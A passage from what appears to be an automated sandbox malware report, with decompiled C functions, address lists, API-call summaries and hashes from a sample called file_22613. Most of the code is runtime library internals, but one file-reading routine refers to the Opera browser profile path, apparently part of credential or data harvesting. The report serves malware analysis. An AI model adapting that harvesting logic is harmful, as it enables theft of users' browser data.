                                                                                							_t278 = E00418F73(_t370 - 0x6c,  *((intOrPtr*)(_t370 + 0x20)),  *((intOrPtr*)(_t370 + 0x24)),  *((intOrPtr*)(_t370 - 0x7c)),  *(_t370 - 0x54));
                                                                                							 *((intOrPtr*)(_t370 + 0x20)) =  *_t278;
                                                                                							_t373 = _t373 + 0x10;
                                                                                							 *(_t370 - 0x54) =  *(_t370 - 0x54) & 0x00000000;
                                                                                							 *((intOrPtr*)(_t370 + 0x24)) =  *((intOrPtr*)(_t278 + 4));
                                                                                						}
                                                                                						_t241 = E0041F230(_t344,  *((char*)(_t370 - 0x60)),  *((intOrPtr*)(_t370 - 0x4c)));
                                                                                						_t374 = _t373 + 0xc;
                                                                                						if(_t241 != 0) {
                                                                                							 *(_t370 - 0x68) = _t241 - _t344 + 1;
                                                                                							_t269 = E004190AD(_t344, 0, _t370 - 0x88, _t241 - _t344 + 1 - 1,  *((intOrPtr*)(_t370 - 0x70)),  *((intOrPtr*)(_t370 + 0x20)),  *((intOrPtr*)(_t370 + 0x24)));
                                                                                							 *((intOrPtr*)(_t370 + 0x20)) =  *_t269;
                                                                                							 *((intOrPtr*)(_t370 + 0x24)) =  *((intOrPtr*)(_t269 + 4));
                                                                                							_t270 = E00418F73(_t370 - 0x88,  *_t269,  *((intOrPtr*)(_t269 + 4)), 0x30,  *(_t370 - 0x5c));
                                                                                							 *((intOrPtr*)(_t370 + 0x20)) =  *_t270;
                                                                                							 *((intOrPtr*)(_t370 + 0x24)) =  *((intOrPtr*)(_t270 + 4));
                                                                                							 *((char*)(_t370 - 0x74)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t370 - 0x74)))) + 4))();
                                                                                							_t274 = E00418F73(_t370 - 0x88,  *((intOrPtr*)(_t370 + 0x20)),  *((intOrPtr*)(_t370 + 0x24)),  *((intOrPtr*)(_t370 - 0x74)), 1);
                                                                                							 *((intOrPtr*)(_t370 + 0x20)) =  *_t274;
                                                                                							 *((intOrPtr*)(_t370 + 0x24)) =  *((intOrPtr*)(_t274 + 4));
                                                                                							_t275 = E00418F73(_t370 - 0x78,  *_t274,  *((intOrPtr*)(_t274 + 4)), 0x30,  *(_t370 - 0x64));
                                                                                							 *((intOrPtr*)(_t370 + 0x20)) =  *_t275;
                                                                                							 *((intOrPtr*)(_t370 + 0x24)) =  *((intOrPtr*)(_t275 + 4));
                                                                                							_t277 =  *(_t370 - 0x68);
                                                                                							_t344 = _t344 + _t277;
                                                                                							_t374 = _t374 + 0x44;
                                                                                							 *((intOrPtr*)(_t370 - 0x4c)) =  *((intOrPtr*)(_t370 - 0x4c)) - _t277;
                                                                                							 *((intOrPtr*)(_t370 - 0x50)) = _t344;
                                                                                						}
                                                                                						_t242 = E0041F230(_t344, 0x65,  *((intOrPtr*)(_t370 - 0x4c)));
                                                                                						_t375 = _t374 + 0xc;
                                                                                						if(_t242 != 0) {
                                                                                							 *((intOrPtr*)(_t370 - 0x74)) = _t242 - _t344 + 1;
                                                                                							_t258 = E004190AD(_t344, 0, _t370 - 0x90, _t242 - _t344 + 1 - 1,  *((intOrPtr*)(_t370 - 0x70)),  *((intOrPtr*)(_t370 + 0x20)),  *((intOrPtr*)(_t370 + 0x24)));
                                                                                							 *((intOrPtr*)(_t370 + 0x20)) =  *_t258;
                                                                                							 *((intOrPtr*)(_t370 + 0x24)) =  *((intOrPtr*)(_t258 + 4));
                                                                                							_t259 = E00418F73(_t370 - 0x90,  *_t258,  *((intOrPtr*)(_t258 + 4)), 0x30,  *(_t370 - 0x58));
                                                                                							 *(_t370 - 0x58) =  *(_t370 - 0x58) & 0x00000000;
                                                                                							 *((intOrPtr*)(_t370 + 0x20)) =  *_t259;
                                                                                							_t379 = _t375 + 0x24;
                                                                                							 *((intOrPtr*)(_t370 + 0x24)) =  *((intOrPtr*)(_t259 + 4));
                                                                                							_t324 = "E";
                                                                                							if(( *(_t301 + 0x14) & 0x00000004) == 0) {
                                                                                								_t324 = "e";
                                                                                							}
                                                                                							_t261 = E00419074(_t324, _t370 - 0x90,  *_t259,  *((intOrPtr*)(_t259 + 4)), 1);
                                                                                							_t301 =  *((intOrPtr*)(_t370 - 0x80));
                                                                                							 *((intOrPtr*)(_t370 + 0x20)) =  *_t261;
                                                                                							 *((intOrPtr*)(_t370 + 0x24)) =  *((intOrPtr*)(_t261 + 4));
                                                                                							_t263 =  *((intOrPtr*)(_t370 - 0x74));
                                                                                							 *((intOrPtr*)(_t370 - 0x50)) =  *((intOrPtr*)(_t370 - 0x50)) + _t263;
                                                                                							_t344 =  *((intOrPtr*)(_t370 - 0x50));
                                                                                							_t375 = _t379 + 0xc;
                                                                                							 *((intOrPtr*)(_t370 - 0x4c)) =  *((intOrPtr*)(_t370 - 0x4c)) - _t263;
                                                                                						}
                                                                                						_t245 = E004190AD(_t344, 0, _t370 - 0x78,  *((intOrPtr*)(_t370 - 0x4c)),  *((intOrPtr*)(_t370 - 0x70)),  *((intOrPtr*)(_t370 + 0x20)),  *((intOrPtr*)(_t370 + 0x24)));
                                                                                						 *((intOrPtr*)(_t370 + 0x20)) =  *_t245;
                                                                                						 *((intOrPtr*)(_t370 + 0x24)) =  *((intOrPtr*)(_t245 + 4));
                                                                                						_t246 = E00418F73(_t370 - 0x6c,  *_t245,  *((intOrPtr*)(_t245 + 4)), 0x30,  *(_t370 - 0x58));
                                                                                						 *((intOrPtr*)(_t370 + 0x20)) =  *_t246;
                                                                                						 *((intOrPtr*)(_t370 + 0x24)) =  *((intOrPtr*)(_t246 + 4));
                                                                                						 *((intOrPtr*)(_t301 + 0x20)) = 0;
                                                                                						 *((intOrPtr*)(_t301 + 0x24)) = 0;
                                                                                						E00418F73( *((intOrPtr*)(_t370 + 8)),  *_t246,  *((intOrPtr*)(_t246 + 4)),  *((intOrPtr*)(_t370 - 0x7c)),  *(_t370 - 0x54));
                                                                                						E00402C34(_t370 - 0x2c, 1, 0);
                                                                                						E00402C34(_t370 - 0x48, 1, 0);
                                                                                						return E00421A61(_t301, 0,  *((intOrPtr*)(_t370 + 8)));
                                                                                					} else {
                                                                                						_t283 =  *((intOrPtr*)(_t370 - 0x48));
                                                                                						if( *((intOrPtr*)(_t370 - 0x34)) < 0x10) {
                                                                                							_t283 = _t370 - 0x48;
                                                                                						}
                                                                                						_t389 =  *_t283;
                                                                                						if( *_t283 > 0) {
                                                                                							E0040D1DF(_t370 - 0x2c,  *((intOrPtr*)(_t370 - 0x4c)), _t370, _t389, _t344);
                                                                                							if( *(_t370 - 0x54) != 0) {
                                                                                								__eflags =  *(_t370 - 0x68);
                                                                                								if( *(_t370 - 0x68) == 0) {
                                                                                									E0040D70E( *(_t370 - 0x5c), _t313, _t370 - 0x2c, _t370, 0x30);
                                                                                									_t52 = _t370 - 0x5c;
                                                                                									 *_t52 =  *(_t370 - 0x5c) & 0x00000000;
                                                                                									__eflags =  *_t52;
                                                                                								}
                                                                                								__eflags =  *(_t370 - 0x54) -  *((intOrPtr*)(_t370 - 0x50));
                                                                                								E00418795(_t313,  *(_t370 - 0x54) -  *((intOrPtr*)(_t370 - 0x50)), _t370 - 0x2c, _t370,  *(_t370 - 0x58), 0x30);
                                                                                								_t344 =  *((intOrPtr*)(_t370 - 0x50));
                                                                                							} else {
                                                                                								E0040D70E( *(_t370 - 0x58), _t313, _t370 - 0x2c, _t370, 0x30);
                                                                                							}
                                                                                							_t303 =  *(_t370 - 0x68);
                                                                                							_push(0x30);
                                                                                							_t365 = _t370 - 0x2c;
                                                                                							if(_t303 != 0) {
                                                                                								_push( *(_t370 - 0x64));
                                                                                								_t63 = _t303 - _t344 + 1; // 0x1
                                                                                								E00418795(_t313, _t63, _t365, _t370);
                                                                                								E00418795(_t313, _t303 - _t344, _t370 - 0x2c, _t370,  *(_t370 - 0x5c), 0x30);
                                                                                								_t66 = _t370 - 0x64;
                                                                                								 *_t66 =  *(_t370 - 0x64) & 0x00000000;
                                                                                								__eflags =  *_t66;
                                                                                							} else {
                                                                                								E0040D70E( *(_t370 - 0x5c), _t313, _t365, _t370);
                                                                                							}
                                                                                							 *(_t370 - 0x5c) =  *(_t370 - 0x5c) & 0x00000000;
                                                                                							_t305 =  *((intOrPtr*)(_t370 - 0x48));
                                                                                							if( *((intOrPtr*)(_t370 - 0x34)) < 0x10) {
                                                                                								_t305 = _t370 - 0x48;
                                                                                							}
                                                                                							_t289 =  *((intOrPtr*)(_t370 - 0x2c));
                                                                                							if( *((intOrPtr*)(_t370 - 0x18)) < 0x10) {
                                                                                								_t289 = _t370 - 0x2c;
                                                                                							}
                                                                                							_t352 = E00420F40(_t370 - 0x60, _t289, _t370 - 0x60);
                                                                                							while(1) {
                                                                                								_t291 =  *_t305;
                                                                                								if(_t291 == 0x7f) {
                                                                                									break;
                                                                                								}
                                                                                								__eflags = _t291;
                                                                                								if(_t291 <= 0) {
                                                                                									break;
                                                                                								}
                                                                                								_t340 = _t352 -  *(_t370 - 0x84);
                                                                                								_t294 = _t291;
                                                                                								__eflags = _t294 - _t352 -  *(_t370 - 0x84);
                                                                                								if(_t294 >= _t352 -  *(_t370 - 0x84)) {
                                                                                									break;
                                                                                								}
                                                                                								_t352 = _t352 - _t294;
                                                                                								E00418795(_t340, _t352, _t370 - 0x2c, _t370, 1, 0);
                                                                                								_t296 = _t305 + 1;
                                                                                								__eflags =  *_t296;
                                                                                								if( *_t296 > 0) {
                                                                                									_t305 = _t296;
                                                                                								}
                                                                                							}
                                                                                							_t292 =  *((intOrPtr*)(_t370 - 0x2c));
                                                                                							if( *((intOrPtr*)(_t370 - 0x18)) < 0x10) {
                                                                                								_t292 = _t370 - 0x2c;
                                                                                							}
                                                                                							 *(_t370 - 0x58) =  *(_t370 - 0x58) & 0x00000000;
                                                                                							_t301 =  *((intOrPtr*)(_t370 - 0x80));
                                                                                							 *((intOrPtr*)(_t370 - 0x50)) = _t292;
                                                                                							_t344 =  *((intOrPtr*)(_t370 - 0x50));
                                                                                							 *((intOrPtr*)(_t370 - 0x4c)) =  *((intOrPtr*)(_t370 - 0x1c));
                                                                                						}
                                                                                						goto L32;
                                                                                					}
                                                                                				}
                                                                                				 *(_t370 - 0x84) = 0;
                                                                                				_t384 = _t226 - 0x2d;
                                                                                				if(_t226 != 0x2d) {
                                                                                					goto L3;
                                                                                				}
                                                                                				goto L2;
                                                                                			}

















































                                                                                0x00418889
                                                                                0x00418893
                                                                                0x0041889b
                                                                                0x004188a1
                                                                                0x004188a7
                                                                                0x004188ad
                                                                                0x004188b3
                                                                                0x004188b5
                                                                                0x004188b7
                                                                                0x004188c2
                                                                                0x004188c5
                                                                                0x004188c8
                                                                                0x004188cd
                                                                                0x004188d2
                                                                                0x004188d7
                                                                                0x004188dc
                                                                                0x004188e4
                                                                                0x004188e7
                                                                                0x004188f2
                                                                                0x004188f7
                                                                                0x00418900
                                                                                0x00418907
                                                                                0x0041890a
                                                                                0x00418911
                                                                                0x00418914
                                                                                0x00418918
                                                                                0x0041891c
                                                                                0x00418920
                                                                                0x0041892c
                                                                                0x0041892c
                                                                                0x00418936
                                                                                0x00418945
                                                                                0x00418948
                                                                                0x00418959
                                                                                0x00418962
                                                                                0x00418967
                                                                                0x0041896a
                                                                                0x0041896f
                                                                                0x00418971
                                                                                0x00418971
                                                                                0x00418978
                                                                                0x0041897b
                                                                                0x0041897d
                                                                                0x0041897d
                                                                                0x00418983
                                                                                0x00418a9e
                                                                                0x00418aa4
                                                                                0x00418aac
                                                                                0x00418aaf
                                                                                0x00418ab2
                                                                                0x00418ac5
                                                                                0x00418abe
                                                                                0x00418ac0
                                                                                0x00418ac0
                                                                                0x00418acb
                                                                                0x00418ad3
                                                                                0x00418ada
                                                                                0x00418af1
                                                                                0x00418af8
                                                                                0x00418afb
                                                                                0x00418afe
                                                                                0x00418b01
                                                                                0x00418b04
                                                                                0x00418b07
                                                                                0x00418b0d
                                                                                0x00418b0d
                                                                                0x00418b1f
                                                                                0x00418b26
                                                                                0x00418b2c
                                                                                0x00418b2f
                                                                                0x00418b33
                                                                                0x00418b33
                                                                                0x00418b3f
                                                                                0x00418b44
                                                                                0x00418b49
                                                                                0x00418b5b
                                                                                0x00418b69
                                                                                0x00418b76
                                                                                0x00418b7c
                                                                                0x00418b8c
                                                                                0x00418b93
                                                                                0x00418b9c
                                                                                0x00418ba9
                                                                                0x00418bbb
                                                                                0x00418bc5
                                                                                0x00418bcb
                                                                                0x00418bd8
                                                                                0x00418bdf
                                                                                0x00418be5
                                                                                0x00418be8
                                                                                0x00418beb
                                                                                0x00418bed
                                                                                0x00418bf0
                                                                                0x00418bf3
                                                                                0x00418bf3
                                                                                0x00418bfc
                                                                                0x00418c01
                                                                                0x00418c06
                                                                                0x00418c18
                                                                                0x00418c26
                                                                                0x00418c33
                                                                                0x00418c39
                                                                                0x00418c49
                                                                                0x00418c50
                                                                                0x00418c54
                                                                                0x00418c5a
                                                                                0x00418c61
                                                                                0x00418c64
                                                                                0x00418c69
                                                                                0x00418c6b
                                                                                0x00418c6b
                                                                                0x00418c7f
                                                                                0x00418c86
                                                                                0x00418c89
                                                                                0x00418c8f
                                                                                0x00418c92
                                                                                0x00418c95
                                                                                0x00418c98
                                                                                0x00418c9b
                                                                                0x00418c9e
                                                                                0x00418c9e
                                                                                0x00418cb3
                                                                                0x00418cc0
                                                                                0x00418cc6
                                                                                0x00418cd3
                                                                                0x00418ce3
                                                                                0x00418ced
                                                                                0x00418cf0
                                                                                0x00418cf3
                                                                                0x00418cf6
                                                                                0x00418d04
                                                                                0x00418d0f
                                                                                0x00418d1b
                                                                                0x00418989
                                                                                0x0041898d
                                                                                0x00418990
                                                                                0x00418992
                                                                                0x00418992
                                                                                0x00418995
                                                                                0x00418998
                                                                                0x004189a5
                                                                                0x004189ae
                                                                                0x004189bf
                                                                                0x004189c3
                                                                                0x004189cd
                                                                                0x004189d2
                                                                                0x004189d2
                                                                                0x004189d2
                                                                                0x004189d2
                                                                                0x004189d9
                                                                                0x004189e4
                                                                                0x004189e9
                                                                                0x004189b0
                                                                                0x004189b8
                                                                                0x004189b8
                                                                                0x004189ec
                                                                                0x004189ef
                                                                                0x004189f1
                                                                                0x004189f6
                                                                                0x00418a02
                                                                                0x00418a07
                                                                                0x00418a0a
                                                                                0x00418a19
                                                                                0x00418a1e
                                                                                0x00418a1e
                                                                                0x00418a1e
                                                                                0x004189f8
                                                                                0x004189fb
                                                                                0x004189fb
                                                                                0x00418a22
                                                                                0x00418a2a
                                                                                0x00418a2d
                                                                                0x00418a2f
                                                                                0x00418a2f
                                                                                0x00418a36
                                                                                0x00418a39
                                                                                0x00418a3b
                                                                                0x00418a3b
                                                                                0x00418a4a
                                                                                0x00418a79
                                                                                0x00418a79
                                                                                0x00418a7d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00418a4e
                                                                                0x00418a50
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00418a54
                                                                                0x00418a5a
                                                                                0x00418a5d
                                                                                0x00418a5f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00418a63
                                                                                0x00418a6a
                                                                                0x00418a6f
                                                                                0x00418a72
                                                                                0x00418a75
                                                                                0x00418a77
                                                                                0x00418a77
                                                                                0x00418a75
                                                                                0x00418a83
                                                                                0x00418a86
                                                                                0x00418a88
                                                                                0x00418a88
                                                                                0x00418a8b
                                                                                0x00418a8f
                                                                                0x00418a92
                                                                                0x00418a98
                                                                                0x00418a9b
                                                                                0x00418a9b
                                                                                0x00000000
                                                                                0x00418998
                                                                                0x00418983
                                                                                0x00418922
                                                                                0x00418928
                                                                                0x0041892a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                APIs
                                                                                • __EH_prolog3_GS.LIBCMT ref: 00418893
                                                                                  • Part of subcall function 0040F3F7: std::locale::facet::_Incref.LIBCPMT ref: 0040F3FE
                                                                                  • Part of subcall function 004191E8: __EH_prolog3.LIBCMT ref: 004191EF
                                                                                  • Part of subcall function 004191E8: std::_Lockit::_Lockit.LIBCPMT ref: 004191F9
                                                                                • _localeconv.LIBCMT ref: 00418936
                                                                                • _strcspn.LIBCMT ref: 00418A43
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog3H_prolog3_IncrefLockitLockit::__localeconv_strcspnstd::_std::locale::facet::_
                                                                                • String ID: e$&D
                                                                                • API String ID: 441263477-1218682416
                                                                                • Opcode ID: f29fdf9584b165c6e0e3167bc408f6b2a189221dbc0f29b719ae5c70147c825b
                                                                                • Instruction ID: 2391ae905ea939ae0dbe5c03a397dfc4a9e7d2f80fd704a93d4ba928ffdd51b6
                                                                                • Opcode Fuzzy Hash: f29fdf9584b165c6e0e3167bc408f6b2a189221dbc0f29b719ae5c70147c825b
                                                                                • Instruction Fuzzy Hash: B9F14671D002489FDF15DFA8C941AEDBBB1FF08308F15416AE908BB252DB79A985CF48
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 79%
                                                                                			E0040F5B8(void** __ebx, long* __esi, CHAR* _a4) {
                                                                                				struct _OVERLAPPED* _v8;
                                                                                				void* _v12;
                                                                                				long _v16;
                                                                                				intOrPtr _v20;
                                                                                				long _v24;
                                                                                				void* _t14;
                                                                                				long _t17;
                                                                                				void* _t18;
                                                                                				void** _t22;
                                                                                
                                                                                				_t22 = __ebx;
                                                                                				_v8 = 0;
                                                                                				_t14 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0, 0);
                                                                                				_v12 = _t14;
                                                                                				if(_t14 == 0 || _t14 == 0xffffffff) {
                                                                                					L10:
                                                                                					return _v8;
                                                                                				} else {
                                                                                					__imp__GetFileSizeEx(_t14,  &_v24);
                                                                                					if(_t14 != 0 && _v20 == 0) {
                                                                                						_t17 = _v24;
                                                                                						 *__esi = _t17;
                                                                                						_t18 = LocalAlloc(0x40, _t17);
                                                                                						 *__ebx = _t18;
                                                                                						if(_t18 != 0) {
                                                                                							if(ReadFile(_v12, _t18,  *__esi,  &_v16, 0) == 0 ||  *__esi != _v16) {
                                                                                								_v8 = 0;
                                                                                								LocalFree( *_t22);
                                                                                							} else {
                                                                                								_v8 = 1;
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                					CloseHandle(_v12);
                                                                                					goto L10;
                                                                                				}
                                                                                			}












                                                                                0x0040f5b8
                                                                                0x0040f5d0
                                                                                0x0040f5d3
                                                                                0x0040f5d9
                                                                                0x0040f5de
                                                                                0x0040f646
                                                                                0x0040f64b
                                                                                0x0040f5e5
                                                                                0x0040f5ea
                                                                                0x0040f5f2
                                                                                0x0040f5f9
                                                                                0x0040f5ff
                                                                                0x0040f601
                                                                                0x0040f607
                                                                                0x0040f60b
                                                                                0x0040f620
                                                                                0x0040f634
                                                                                0x0040f637
                                                                                0x0040f629
                                                                                0x0040f629
                                                                                0x0040f629
                                                                                0x0040f620
                                                                                0x0040f60b
                                                                                0x0040f640
                                                                                0x00000000
                                                                                0x0040f640

                                                                                APIs
                                                                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 0040F5D3
                                                                                • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00414013,?,\Opera Stable\), ref: 0040F5EA
                                                                                • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?,?,?,00414013,?,\Opera Stable\), ref: 0040F601
                                                                                • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 0040F618
                                                                                • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00414013,?,\Opera Stable\), ref: 0040F637
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00414013,?,\Opera Stable\), ref: 0040F640
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                • String ID:
                                                                                • API String ID: 2311089104-0
                                                                                • Opcode ID: 3b4c9ab9f4287105c219cc39ab907cd3b0e579fd6292bf237c5ac1d7732f0d53
                                                                                • Instruction ID: 6476f34f5b3a8103b5671e5f2ea3a48eb7ee99b47669c84d37c6fd9ec7a577ba
                                                                                • Opcode Fuzzy Hash: 3b4c9ab9f4287105c219cc39ab907cd3b0e579fd6292bf237c5ac1d7732f0d53
                                                                                • Instruction Fuzzy Hash: A1113D74900208EFDB219FA4CC48EAEBBB9EB45700F200979F541B22A4D7769A57DB15
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 90%
                                                                                			E0042347F(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                				intOrPtr _t48;
                                                                                				intOrPtr _t57;
                                                                                				void* _t58;
                                                                                				void* _t61;
                                                                                
                                                                                				_t61 = __eflags;
                                                                                				_t53 = __edx;
                                                                                				_push(0x2c);
                                                                                				_push(0x443d68);
                                                                                				E00424400(__ebx, __edi, __esi);
                                                                                				_t48 = __ecx;
                                                                                				_t55 =  *((intOrPtr*)(_t58 + 0xc));
                                                                                				_t57 =  *((intOrPtr*)(_t58 + 8));
                                                                                				 *((intOrPtr*)(_t58 - 0x1c)) = __ecx;
                                                                                				 *(_t58 - 0x34) =  *(_t58 - 0x34) & 0x00000000;
                                                                                				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc)) - 4));
                                                                                				 *((intOrPtr*)(_t58 - 0x28)) = E00421870(_t58 - 0x3c,  *((intOrPtr*)(_t57 + 0x18)));
                                                                                				 *((intOrPtr*)(_t58 - 0x2c)) =  *((intOrPtr*)(E00427B66(__edx, _t55, _t61) + 0x88));
                                                                                				 *((intOrPtr*)(_t58 - 0x30)) =  *((intOrPtr*)(E00427B66(__edx, _t55, _t61) + 0x8c));
                                                                                				 *((intOrPtr*)(E00427B66(_t53, _t55, _t61) + 0x88)) = _t57;
                                                                                				 *((intOrPtr*)(E00427B66(_t53, _t55, _t61) + 0x8c)) =  *((intOrPtr*)(_t58 + 0x10));
                                                                                				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
                                                                                				 *((intOrPtr*)(_t58 + 0x10)) = 1;
                                                                                				 *(_t58 - 4) = 1;
                                                                                				 *((intOrPtr*)(_t58 - 0x1c)) = E00421915(_t55,  *((intOrPtr*)(_t58 + 0x14)), _t48,  *((intOrPtr*)(_t58 + 0x18)),  *((intOrPtr*)(_t58 + 0x1c)));
                                                                                				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
                                                                                				 *(_t58 - 4) = 0xfffffffe;
                                                                                				 *((intOrPtr*)(_t58 + 0x10)) = 0;
                                                                                				E004235A5(_t48, _t53, _t55, _t57, _t61);
                                                                                				return E00424445( *((intOrPtr*)(_t58 - 0x1c)));
                                                                                			}







                                                                                0x0042347f
                                                                                0x0042347f
                                                                                0x0042347f
                                                                                0x00423481
                                                                                0x00423486
                                                                                0x0042348b
                                                                                0x0042348d
                                                                                0x00423490
                                                                                0x00423493
                                                                                0x00423496
                                                                                0x0042349d
                                                                                0x004234ae
                                                                                0x004234bc
                                                                                0x004234ca
                                                                                0x004234d2
                                                                                0x004234e0
                                                                                0x004234e6
                                                                                0x004234ed
                                                                                0x004234f0
                                                                                0x00423506
                                                                                0x00423509
                                                                                0x0042357e
                                                                                0x00423585
                                                                                0x0042358c
                                                                                0x00423599

                                                                                APIs
                                                                                • __CreateFrameInfo.LIBCMT ref: 004234A7
                                                                                  • Part of subcall function 00421870: __getptd.LIBCMT ref: 0042187E
                                                                                  • Part of subcall function 00421870: __getptd.LIBCMT ref: 0042188C
                                                                                • __getptd.LIBCMT ref: 004234B1
                                                                                  • Part of subcall function 00427B66: __getptd_noexit.LIBCMT ref: 00427B69
                                                                                  • Part of subcall function 00427B66: __amsg_exit.LIBCMT ref: 00427B76
                                                                                • __getptd.LIBCMT ref: 004234BF
                                                                                • __getptd.LIBCMT ref: 004234CD
                                                                                • __getptd.LIBCMT ref: 004234D8
                                                                                • _CallCatchBlock2.LIBCMT ref: 004234FE
                                                                                  • Part of subcall function 00421915: __CallSettingFrame@12.LIBCMT ref: 00421961
                                                                                  • Part of subcall function 004235A5: __getptd.LIBCMT ref: 004235B4
                                                                                  • Part of subcall function 004235A5: __getptd.LIBCMT ref: 004235C2
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                • String ID:
                                                                                • API String ID: 1602911419-0
                                                                                • Opcode ID: 0169f375b130e5cabf392b8f6fbbf7cdaa7c665f2f4d705376cb3fcd97fe719f
                                                                                • Instruction ID: 970687e236d75bba022f323ded1f8f8acb793f367a031bbe68b9fa7438ec3659
                                                                                • Opcode Fuzzy Hash: 0169f375b130e5cabf392b8f6fbbf7cdaa7c665f2f4d705376cb3fcd97fe719f
                                                                                • Instruction Fuzzy Hash: 1B11D7B1E00219EFDB00EFA5E585BAD7BB0FF04319F50806AF914A7291DB389A519F58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • __CreateFrameInfo.LIBCMT ref: 00C7BFEC
                                                                                  • Part of subcall function 00C736D8: __getptd.LIBCMT ref: 00C736E6
                                                                                  • Part of subcall function 00C736D8: __getptd.LIBCMT ref: 00C736F4
                                                                                • __getptd.LIBCMT ref: 00C7BFF6
                                                                                  • Part of subcall function 00C771DA: __getptd_noexit.LIBCMT ref: 00C771DD
                                                                                  • Part of subcall function 00C771DA: __amsg_exit.LIBCMT ref: 00C771EA
                                                                                • __getptd.LIBCMT ref: 00C7C004
                                                                                • __getptd.LIBCMT ref: 00C7C012
                                                                                • __getptd.LIBCMT ref: 00C7C01D
                                                                                • _CallCatchBlock2.LIBCMT ref: 00C7C043
                                                                                  • Part of subcall function 00C7377D: __CallSettingFrame@12.LIBCMT ref: 00C737C9
                                                                                  • Part of subcall function 00C7C0EA: __getptd.LIBCMT ref: 00C7C0F9
                                                                                  • Part of subcall function 00C7C0EA: __getptd.LIBCMT ref: 00C7C107
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508759068.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C60000, based on PE: true
                                                                                • Associated: 00000011.00000002.508712302.0000000000C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.509144454.0000000000C80000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511051633.0000000000DA8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511085555.0000000000DAC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511119912.0000000000DB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_c60000_file_22613.jbxd
                                                                                Similarity
                                                                                • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                • String ID:
                                                                                • API String ID: 1602911419-0
                                                                                • Opcode ID: 9240d06fd83b67cfc6d4b07f2531fc850144dc0ecd625aaf3ede75107e353827
                                                                                • Instruction ID: 9a95da0eef0f0352db2f0772596471f618c510e16aa5fb158fd253b7914a0322
                                                                                • Opcode Fuzzy Hash: 9240d06fd83b67cfc6d4b07f2531fc850144dc0ecd625aaf3ede75107e353827
                                                                                • Instruction Fuzzy Hash: A011C3B1D04209EFDF04EFA4C946AADBBB0FF08315F50C569F818A7251EB389A15AF50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • _malloc.LIBCMT ref: 00C73123
                                                                                  • Part of subcall function 00C71D0A: __FF_MSGBANNER.LIBCMT ref: 00C71D2D
